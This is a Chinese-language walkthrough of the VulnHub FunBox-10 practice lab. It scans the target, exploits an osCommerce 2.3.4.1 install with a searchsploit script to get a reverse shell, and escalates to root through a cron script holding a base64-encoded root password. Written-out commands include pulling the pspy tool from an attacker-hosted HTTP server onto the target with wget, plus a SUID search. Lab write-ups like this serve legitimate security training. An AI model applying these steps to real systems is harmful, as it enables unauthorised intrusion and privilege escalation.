vulnhub靶场之FunBox-10

一.环境搭建

1.靶场描述

As always, it's a very easy box for beginners.
This works better on VitualBox rather than VMware 

2.靶场下载

Funbox: Under Construction! ~ VulnHub

image-20240601200957812

3.靶场启动

image-20240601201039869

靶场IP地址我们不知道,但是网段我们知道是192.168.2.0/24

二.信息收集

1.寻找靶场真实IP地址

nmap -sP 192.168.2.0/24

image-20240601201306195

arp-scan -l

image-20240601201341570

通过上面两个命令我们知道,靶场IP地址为192.168.2.12

2.探测端口及服务

nmap -p- -sV 192.168.2.12

image-20240601201555704

开启了22端口,服务为ssh
开启了25端口,服务为smtp
开启了80端口,服务为Apache httpd 2.4.18 ((Ubuntu))
开启了110端口,服务为pop3  
开启了143端口,服务为imap   

三.渗透测试

1.访问web服务

http://192.168.2.12

image-20240601201945838

2.扫描web服务

1)nikto扫描

image-20240601202217331

扫描也没有

2)dirb扫描

image-20240601202758265

3)dirsearch扫描

image-20240601202820443

4)gobuster扫描

image-20240601202606520

通过上面的扫描,我们只扫描到一个路径/catalog,我们进行查看

3.渗透测试

1)访问/catalog

http://192.168.2.12/catalog/install/index.php

image-20240601202846664

我们可以看到osCommerce是一个电子商务系统,而且知道它的版本是2.3.4.1,我们进行搜索相关的漏洞

image-20240601203035139

2)搜索相关漏洞

searchsploit osCommerce 2.3.4.1

image-20240601203312680

我们可以看到一个python脚本,我们下载下来进行查看

3)下载python脚本

searchsploit  -m php/webapps/44374.py

image-20240601203458667

image-20240601203707296

4)反弹脚本

image-20240601204459715

image-20240601205001683

记得一定要访问这个页面,不然的话反弹不成功

http://192.168.2.12/catalog/install/includes/configure.php

image-20240601205022179

image-20240601205257017

我们可以看到权限比较低,我们进行提升权限

5)提权

find / -user root -perm -4000 -print 2>/dev/null 发现没有什么可以利用的

image-20240601210625310

我们利用pspy

黑客可以利用它来查看其他用户的计划任务工作 (cron job)等,该工具也非常适合技术人员在CTF(Capture The Flag)中枚举Linux系统。 pspy是一个 命令行工具 ,它可以在没有Root权限的情况下,监控Linux进程.

GitCode - 全球开发者的开源社区,开源代码托管平台

image-20240601210942360

我们进行下载,然后上传到靶机里面

python -m http.server 8080

wget http://192.168.2.9:8080/pspy64

image-20240601211705388

因为添加执行权限需要权限,我们切换到/tmp/目录下

image-20240601211922746

我们添加权限,执行脚本

image-20240601212056381

执行脚本,我们发现有个cron的定时任务

image-20240601215104464

脚本执行了很长时间

cat /usr/share/doc/examples/cron.sh
我们发现了一个加密的参数,是用base64加密的文件(以”==”结尾的多半是base64加密),我可以尝试解密,解码后发现是root的密码和账户,我们可以尝试登录

image-20240601215443427

image-20240601215637811

我们可以看到root密码是rfvbgt!!

image-20240601215816672

渗透测试结束

  • 21
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MS02423

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值